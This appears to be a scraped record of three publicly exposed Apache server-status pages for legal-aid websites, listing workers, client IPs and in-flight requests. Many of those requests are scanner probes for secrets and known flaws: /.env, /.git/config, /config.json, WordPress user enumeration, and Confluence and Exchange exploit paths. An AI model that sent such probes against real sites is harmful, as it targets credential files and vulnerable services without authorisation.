SSReqConnChildSlotClientProtocolVHostRequest 0-54284390/13/149116_ 1.121710460.00.117129.90 70.132.63.132http/1.1survey.alas.org:8080GET /s/31332e3232342e3138392e3734/_/;/META-INF/maven/com.atlass 1-54282740/24/146313_ 0.721800.00.487406.39 70.132.63.132http/1.1survey.alas.org:8080GET /.env HTTP/1.1 2-54282790/22/138690_ 2.381800.00.406786.84 70.132.63.132http/1.1survey.alas.org:8080GET /.DS_Store HTTP/1.1 3-54284440/4/138060_ 1.0682550.00.116843.78 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 4-54284510/6/132815_ 1.271711170.00.276872.45 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 5-54277790/79/127554_ 6.3883710.02.146306.05 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 6-54-0/0/123208. 1.97900.00.006154.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-54279602/58/116766K 5.53302.11.125991.82 15.158.43.200http/1.1picturingjustice.org:8080GET /config.json HTTP/1.1 8-54284281/9/111213K 2.503042.70.095413.86 15.158.43.200http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 9-54284521/11/109802K 1.54344881.50.225360.63 130.176.29.140http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 10-54284610/7/103120_ 1.2561260.00.174844.88 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 11-54284620/8/90827_ 0.54164790.00.084417.14 70.132.63.132http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 12-54284630/8/81752_ 0.74000.00.084061.28 70.132.63.132http/1.1picturingjustice.org:8080GET /s/31332e3232342e3138392e3236/_/;/META-INF/maven/com.atlass 13-54283940/11/76026_ 1.291711000.00.033612.15 70.132.63.132http/1.1survey.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 14-54277901/77/71387K 6.94321.53.333478.01 15.158.43.200http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 15-54284640/12/68080_ 0.4565250.00.083513.42 130.176.211.201http/1.1atlantalegalaid.org:8080HEAD / HTTP/1.1 16-54-0/0/58815. 1.31200.00.002692.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-54283057/22/48139K 1.990092.50.552319.89 70.132.63.132http/1.1legalaidconnections.org:8080GET / HTTP/1.1 18-54284820/3/44103_ 0.55191330.00.002305.00 204.246.166.105http/1.1esign.alas.org:8080GET / HTTP/1.1 19-54284830/6/40560_ 1.251610.00.221989.78 70.132.63.80http/1.1gwinnettfamilylawclinic.org:808GET /config.json HTTP/1.1 20-54284880/4/41159_ 0.5731630.00.012010.74 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET /telescope/requests HTTP/1.1 21-54284890/13/35255_ 0.35000.00.171734.06 70.132.63.132http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 22-54284900/6/38400_ 0.59000.00.011750.95 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 23-54-0/0/34537. 1.32600.00.001616.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-54284920/8/31223_ 0.682930.00.061522.01 130.176.137.155http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 25-54285211/9/16891K 0.10301.00.05728.46 15.158.43.200http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 26-54285220/9/11333_ 0.101800.00.05570.89 70.132.63.132http/1.1survey.alas.org:8080GET /.git/config HTTP/1.1 27-54285230/8/11706_ 0.101712810.00.01472.33 70.132.63.132http/1.1survey.alas.org:8080GET /info.php HTTP/1.1 28-54-0/0/9877. 0.531900.00.00430.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-54-0/0/9781. 0.24100.00.00403.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-54285260/5/10667_ 0.311800.00.05492.76 70.132.63.132http/1.1survey.alas.org:8080GET /.DS_Store HTTP/1.1 31-54285270/4/9053_ 0.331800.00.08376.45 70.132.63.132http/1.1survey.alas.org:8080GET /.git/config HTTP/1.1 32-54285280/5/10172_ 0.1585210.00.09452.37 70.132.63.80http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 33-54285332/5/10596K 1.02302.10.00457.74 15.158.43.200http/1.1picturingjustice.org:8080GET /login.action HTTP/1.1 34-54-0/0/10174. 0.541800.00.00466.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-54285590/2/10774_ 0.58183260.00.03445.11 130.176.137.155http/1.1gwinnettfamilylawclinic.org:808POST /wp-login.php HTTP/1.1 36-54-0/0/9041. 0.532200.00.00379.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-54285690/5/10091_ 0.72000.00.01404.91 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 38-54285700/3/8217_ 0.6483900.00.15401.63 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 39-54285910/2/9920_ 0.551900.00.02383.62 204.246.166.105http/1.1short.alas.org:8080GET / HTTP/1.1 40-54-0/0/10176. 0.27800.00.00360.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-54286010/7/2156_ 0.4161330.00.2678.92 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 42-54286020/7/1049_ 0.64000.00.0940.33 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 43-54286030/5/1039_ 0.281900.00.0545.03 204.246.166.105http/1.1on.alas.org:8080GET / HTTP/1.1 44-54286044/5/636K 0.65414187.60.1171.24 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 45-54286050/8/995_ 0.64000.00.0953.02 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 46-54286060/3/685_ 0.6683230.00.1517.30 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 47-54286070/4/1013_ 0.161710340.00.0546.81 70.132.63.132http/1.1survey.alas.org:8080GET /telescope/requests HTTP/1.1 48-54-0/0/688. 0.402000.00.0020.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-54286090/5/699_ 0.191711770.00.0521.45 70.132.63.132http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 50-54286100/8/631_ 0.081711130.00.0128.45 70.132.63.132http/1.1survey.alas.org:8080GET /server-status HTTP/1.1 51-54286433/6/744K 0.66303.70.1227.37 15.158.43.200http/1.1picturingjustice.org:8080GET /s/35322e32312e3230392e3738/_/;/META-INF/maven/com.atlassia 52-54286480/6/685_ 0.13164580.00.0421.08 70.132.63.132http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 53-54286490/8/502_ 0.0731380.00.0120.15 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET /server-status HTTP/1.1 54-54
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed93725f21
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Thursday, 18-Aug-2022 00:06:24 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 55 Parent Server MPM Generation: 54 Server uptime: 54 days 17 hours 22 minutes 43 seconds Server load: 5.87 1.77 0.61 Total accesses: 2348649 - Total Traffic: 111.6 GB CPU Usage: u70.63 s10.07 cu0 cs0 - .00171% CPU load .497 requests/sec - 24.8 kB/second - 49.8 kB/request 25 requests currently being processed, 101 idle workers ______.KKK____K_.K_____._K__..___K._.___.___K___.__K___K____._.K WC_..______________________.KC______.C.K__.K_._K_._..__.______._ ____K.__K_K________KKK Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-54284390/13/149116_ 1.121710460.00.117129.90 70.132.63.132http/1.1survey.alas.org:8080GET /s/31332e3232342e3138392e3734/_/;/META-INF/maven/com.atlass 1-54282740/24/146313_ 0.721800.00.487406.39 70.132.63.132http/1.1survey.alas.org:8080GET /.env HTTP/1.1 2-54282790/22/138690_ 2.381800.00.406786.84 70.132.63.132http/1.1survey.alas.org:8080GET /.DS_Store HTTP/1.1 3-54284440/4/138060_ 1.0682550.00.116843.78 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 4-54284510/6/132815_ 1.271711170.00.276872.45 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 5-54277790/79/127554_ 6.3883710.02.146306.05 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 6-54-0/0/123208. 1.97900.00.006154.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-54279602/58/116766K 5.53302.11.125991.82 15.158.43.200http/1.1picturingjustice.org:8080GET /config.json HTTP/1.1 8-54284281/9/111213K 2.503042.70.095413.86 15.158.43.200http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 9-54284521/11/109802K 1.54344881.50.225360.63 130.176.29.140http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 10-54284610/7/103120_ 1.2561260.00.174844.88 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 11-54284620/8/90827_ 0.54164790.00.084417.14 70.132.63.132http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 12-54284630/8/81752_ 0.74000.00.084061.28 70.132.63.132http/1.1picturingjustice.org:8080GET /s/31332e3232342e3138392e3236/_/;/META-INF/maven/com.atlass 13-54283940/11/76026_ 1.291711000.00.033612.15 70.132.63.132http/1.1survey.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 14-54277901/77/71387K 6.94321.53.333478.01 15.158.43.200http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 15-54284640/12/68080_ 0.4565250.00.083513.42 130.176.211.201http/1.1atlantalegalaid.org:8080HEAD / HTTP/1.1 16-54-0/0/58815. 1.31200.00.002692.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-54283057/22/48139K 1.990092.50.552319.89 70.132.63.132http/1.1legalaidconnections.org:8080GET / HTTP/1.1 18-54284820/3/44103_ 0.55191330.00.002305.00 204.246.166.105http/1.1esign.alas.org:8080GET / HTTP/1.1 19-54284830/6/40560_ 1.251610.00.221989.78 70.132.63.80http/1.1gwinnettfamilylawclinic.org:808GET /config.json HTTP/1.1 20-54284880/4/41159_ 0.5731630.00.012010.74 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET /telescope/requests HTTP/1.1 21-54284890/13/35255_ 0.35000.00.171734.06 70.132.63.132http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 22-54284900/6/38400_ 0.59000.00.011750.95 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 23-54-0/0/34537. 1.32600.00.001616.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-54284920/8/31223_ 0.682930.00.061522.01 130.176.137.155http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 25-54285211/9/16891K 0.10301.00.05728.46 15.158.43.200http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 26-54285220/9/11333_ 0.101800.00.05570.89 70.132.63.132http/1.1survey.alas.org:8080GET /.git/config HTTP/1.1 27-54285230/8/11706_ 0.101712810.00.01472.33 70.132.63.132http/1.1survey.alas.org:8080GET /info.php HTTP/1.1 28-54-0/0/9877. 0.531900.00.00430.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-54-0/0/9781. 0.24100.00.00403.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-54285260/5/10667_ 0.311800.00.05492.76 70.132.63.132http/1.1survey.alas.org:8080GET /.DS_Store HTTP/1.1 31-54285270/4/9053_ 0.331800.00.08376.45 70.132.63.132http/1.1survey.alas.org:8080GET /.git/config HTTP/1.1 32-54285280/5/10172_ 0.1585210.00.09452.37 70.132.63.80http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 33-54285332/5/10596K 1.02302.10.00457.74 15.158.43.200http/1.1picturingjustice.org:8080GET /login.action HTTP/1.1 34-54-0/0/10174. 0.541800.00.00466.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-54285590/2/10774_ 0.58183260.00.03445.11 130.176.137.155http/1.1gwinnettfamilylawclinic.org:808POST /wp-login.php HTTP/1.1 36-54-0/0/9041. 0.532300.00.00379.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-54285690/5/10091_ 0.72000.00.01404.91 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 38-54285700/3/8217_ 0.6483900.00.15401.63 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 39-54285910/2/9920_ 0.551900.00.02383.62 204.246.166.105http/1.1short.alas.org:8080GET / HTTP/1.1 40-54-0/0/10176. 0.27800.00.00360.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-54286010/7/2156_ 0.4161330.00.2678.92 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 42-54286020/7/1049_ 0.64000.00.0940.33 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 43-54286030/5/1039_ 0.281900.00.0545.03 204.246.166.105http/1.1on.alas.org:8080GET / HTTP/1.1 44-54286044/5/636K 0.65414187.60.1171.24 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 45-54286050/8/995_ 0.64000.00.0953.02 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 46-54286060/3/685_ 0.6683230.00.1517.30 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 47-54286070/4/1013_ 0.161710340.00.0546.81 70.132.63.132http/1.1survey.alas.org:8080GET /telescope/requests HTTP/1.1 48-54-0/0/688. 0.402100.00.0020.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-54286090/5/699_ 0.191711770.00.0521.45 70.132.63.132http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 50-54286100/8/631_ 0.081711130.00.0128.45 70.132.63.132http/1.1survey.alas.org:8080GET /server-status HTTP/1.1 51-54286433/6/744K 0.66303.70.1227.37 15.158.43.200http/1.1picturingjustice.org:8080GET /s/35322e32312e3230392e3738/_/;/META-INF/maven/com.atlassia 52-54286480/6/685_ 0.13164580.00.0421.08 70.132.63.132http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 53-54286490/8/502_ 0.0731380.00.0120.15 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET /server-status HTTP/1.1 54-54
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627edb0ce17a1
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Thursday, 18-Aug-2022 00:06:31 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 55 Parent Server MPM Generation: 54 Server uptime: 54 days 17 hours 22 minutes 50 seconds Server load: 5.40 1.74 0.60 Total accesses: 2348717 - Total Traffic: 111.6 GB CPU Usage: u70.64 s10.09 cu0 cs0 - .00171% CPU load .497 requests/sec - 24.8 kB/second - 49.8 kB/request 16 requests currently being processed, 102 idle workers .KK_._.______.__._K____.____..K___._.__K.__KK___._C____K_K__._._ _._..___K__________________.________._.K__.K_..__._..__.______._ .__.K.._W___________K_ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-54-0/0/149117. 1.13300.00.007129.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-54282743/27/146316K 0.72304.00.487406.39 70.132.63.132http/1.1legalaidconnections.org:8080GET / HTTP/1.1 2-54282794/26/138694K 2.39206.10.406786.85 70.132.63.132http/1.1legalaidconnections.org:8080GET / HTTP/1.1 3-54284440/4/138060_ 1.06162550.00.116843.78 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 4-54-0/0/132816. 1.27000.00.006872.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-54277790/79/127554_ 6.38153710.02.146306.05 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 6-54-0/0/123208. 1.971700.00.006154.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-54279600/58/116766_ 5.53500.01.125991.82 15.158.43.200http/1.1picturingjustice.org:8080GET /config.json HTTP/1.1 8-54284280/9/111213_ 2.50500.00.095413.86 15.158.43.200http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 9-54284520/12/109803_ 1.54110.00.225360.63 130.176.29.140http/1.1legalaidconnections.org:8080GET / HTTP/1.1 10-54284610/7/103120_ 1.25131260.00.174844.88 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 11-54284620/8/90827_ 0.54234790.00.084417.14 70.132.63.132http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 12-54284630/8/81752_ 0.74700.00.084061.28 70.132.63.132http/1.1picturingjustice.org:8080GET /s/31332e3232342e3138392e3236/_/;/META-INF/maven/com.atlass 13-54-0/0/76027. 1.29100.00.003612.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-54277900/77/71387_ 6.94520.03.333478.01 15.158.43.200http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 15-54284640/12/68080_ 0.45135250.00.083513.42 130.176.211.201http/1.1atlantalegalaid.org:8080HEAD / HTTP/1.1 16-54-0/0/58815. 1.311000.00.002692.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-54283050/24/48141_ 1.99000.00.552319.89 70.132.63.132http/1.1picturingjustice.org:8080GET /.DS_Store HTTP/1.1 18-54284822/5/44105K 0.55302.10.012305.00 70.132.63.132http/1.1legalaidconnections.org:8080GET /.env HTTP/1.1 19-54284830/6/40560_ 1.258610.00.221989.78 70.132.63.80http/1.1gwinnettfamilylawclinic.org:808GET /config.json HTTP/1.1 20-54284880/4/41159_ 0.57101630.00.012010.74 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET /telescope/requests HTTP/1.1 21-54284890/13/35255_ 0.35700.00.171734.06 70.132.63.132http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 22-54284900/6/38400_ 0.59700.00.011750.95 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 23-54-0/0/34537. 1.321400.00.001616.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-54284920/8/31223_ 0.689930.00.061522.01 130.176.137.155http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 25-54285210/9/16891_ 0.10500.00.05728.46 15.158.43.200http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 26-54285220/11/11335_ 0.10000.00.06570.90 70.132.63.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 27-54285230/8/11706_ 0.102412810.00.01472.33 70.132.63.132http/1.1survey.alas.org:8080GET /info.php HTTP/1.1 28-54-0/0/9877. 0.532700.00.00430.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-54-0/0/9781. 0.24900.00.00403.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-54285264/9/10671K 0.310010.40.06492.77 70.132.63.132http/1.1legalaidconnections.org:8080GET /telescope/requests HTTP/1.1 31-54285270/5/9054_ 0.33000.00.08376.45 70.132.63.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 32-54285280/5/10172_ 0.15155210.00.09452.37 70.132.63.80http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 33-54285330/5/10596_ 1.02500.00.00457.74 15.158.43.200http/1.1picturingjustice.org:8080GET /login.action HTTP/1.1 34-54-0/0/10174. 0.542600.00.00466.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-54285590/3/10775_ 0.58010.00.03445.12 204.246.166.105http/1.1legalaidconnections.org:8080GET / HTTP/1.1 36-54-0/0/9041. 0.533000.00.00379.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-54285690/5/10091_ 0.72700.00.01404.91 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 38-54285700/3/8217_ 0.64153900.00.15401.63 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 39-54285912/4/9922K 0.55302.30.02383.62 70.132.63.132http/1.1legalaidconnections.org:8080GET /s/31332e3232342e3138392e3236/_/;/META-INF/maven/com.atlass 40-54-0/0/10176. 0.271600.00.00360.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-54286010/7/2156_ 0.41131330.00.2678.92 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 42-54286020/7/1049_ 0.64700.00.0940.33 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 43-54286032/7/1041K 0.28402.10.0545.03 70.132.63.132http/1.1picturingjustice.org:8080GET /config.json HTTP/1.1 44-54286048/9/640K 0.652092.20.1171.24 70.132.63.132http/1.1legalaidconnections.org:8080GET /config.json HTTP/1.1 45-54286050/8/995_ 0.64700.00.0953.02 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 46-54286060/3/685_ 0.66153230.00.1517.30 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 47-54286070/4/1013_ 0.162410340.00.0546.81 70.132.63.132http/1.1survey.alas.org:8080GET /telescope/requests HTTP/1.1 48-54-0/0/688. 0.402800.00.0020.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-54286090/5/699_ 0.192411770.00.0521.45 70.132.63.132http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 50-54286101/9/632C 0.08000.20.0128.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-54286430/6/744_ 0.66500.00.1227.37 15.158.43.200http/1.1picturingjustice.org:8080GET /s/35322e32312e3230392e3738/_/;/META-INF/maven/com.atlassia 52-54286480/6/685_ 0.13234580.00.0421.08 70.132.63.132http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 53-54286490/8/502_ 0.07101380.00.0120.15 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET /server-status HTTP/1.1 54-54286500/3/621_ 0.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed1827d33e
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-03-16T16:53:42 Current Time: Sunday, 19-Jun-2022 00:05:23 UTC Restart Time: Saturday, 19-Mar-2022 06:12:47 UTC Parent Server Config. Generation: 93 Parent Server MPM Generation: 92 Server uptime: 91 days 17 hours 52 minutes 36 seconds Server load: 9.98 2.55 0.85 Total accesses: 4335078 - Total Traffic: 195.9 GB CPU Usage: u62.07 s9.1 cu0 cs0 - .000898% CPU load .547 requests/sec - 25.9 kB/second - 47.4 kB/request 40 requests currently being processed, 94 idle workers .__KK__KK_W_K.__K.__KK____KKKKCK_.K_K_K_KK_KKK__.W____.._K_K__K_ K______K__._____R_K___K______.K______K_K___._K__.K_.______K.___K _K_.____._____._______ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-92-0/0/276507. 1.03500.00.0013138.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-92123250/5/270926_ 0.921143140.00.1312701.96 70.132.1.80http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-92123260/11/266323_ 0.361218590.00.1812755.87 70.132.1.80http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 3-92121691/7/252878K 0.73011.60.1011597.46 70.132.1.80http/1.1legalaidconnections.org:8080GET / HTTP/1.1 4-92119271/45/245957K 3.61011.31.2411161.78 70.132.1.80http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 5-92121780/8/236736_ 1.421370420.00.3110921.94 70.132.1.80http/1.1events.alas.org:8080GET /login.action HTTP/1.1 6-92123350/5/223985_ 0.8695920.00.2510563.00 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 7-92123361/10/216038K 0.29001.10.1410106.22 70.132.1.80http/1.1legalaidconnections.org:8080GET /s/3134332e3230342e38392e3233/_/;/META-INF/maven/com.atlass 8-92116181/89/207398K 6.05001.04.029424.93 70.132.1.80http/1.1legalaidconnections.org:8080GET /telescope/requests HTTP/1.1 9-92123370/9/196843_ 0.34126380.00.109262.71 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /server-status HTTP/1.1 10-92119280/37/183429W 3.42000.00.898455.44 70.132.1.80http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 11-92121790/10/164368_ 1.4382140.00.507892.38 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 12-92123381/7/158057K 0.80001.00.047066.30 70.132.1.80http/1.1legalaidconnections.org:8080GET /telescope/requests HTTP/1.1 13-92-0/0/153079. 0.62200.00.007022.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-92121890/9/142085_ 1.511385620.00.256207.86 70.132.1.139http/1.1events.alas.org:8080GET /s/3134332e3230342e38392e3233/_/;/META-INF/maven/com.atlass 15-92123560/8/121092_ 0.54827400.00.205772.66 70.132.1.81http/1.1atlantalegalaid.org:8080GET /login.action HTTP/1.1 16-92121981/8/107515K 1.32001.00.245179.97 70.132.1.81http/1.1legalaidconnections.org:8080GET /.DS_Store HTTP/1.1 17-92-0/0/92553. 0.60800.00.004262.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-92123570/10/81023_ 0.1596460.00.103482.35 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 19-92122090/6/79018_ 0.811393880.00.053620.28 70.132.1.80http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 20-92123581/9/77299K 0.18001.00.103566.77 70.132.1.80http/1.1legalaidconnections.org:8080GET /.env HTTP/1.1 21-92123591/4/74264K 0.80001.00.053257.83 70.132.1.80http/1.1legalaidconnections.org:8080GET /.DS_Store HTTP/1.1 22-92123600/5/70345_ 0.29126690.00.083161.99 70.132.1.139http/1.1gwinnettfamilylawclinic.org:808GET /.env HTTP/1.1 23-92122200/9/66674_ 1.841370700.00.162933.68 70.132.1.80http/1.1events.alas.org:8080GET /config.json HTTP/1.1 24-92123610/7/57317_ 0.4094470.00.212564.26 130.176.179.52http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 25-92123620/7/24586_ 0.3695590.00.251165.48 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /s/3134332e3230342e38392e3539/_/;/META-INF/maven/com.atlass 26-92123953/4/18939K 0.53009.40.01848.14 70.132.1.80http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 27-92122441/11/19676K 0.90016.80.13900.15 70.132.1.80http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 28-92123963/4/16960K 0.53004.20.01915.18 70.132.1.80http/1.1legalaidconnections.org:8080GET / HTTP/1.1 29-92123973/4/16254K 0.52004.60.01836.50 70.132.1.80http/1.1legalaidconnections.org:8080GET / HTTP/1.1 30-92123981/2/18132C 0.54000.20.03736.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-92123993/4/16366K 0.52003.70.00783.79 70.132.1.80http/1.1legalaidconnections.org:8080GET /.DS_Store HTTP/1.1 32-92124000/6/14852_ 0.14128430.00.09681.41 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 33-92-0/0/16382. 1.201400.00.00735.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-92122751/8/15962K 1.42001.00.08756.48 70.132.1.80http/1.1legalaidconnections.org:8080GET /.env HTTP/1.1 35-92122800/7/16369_ 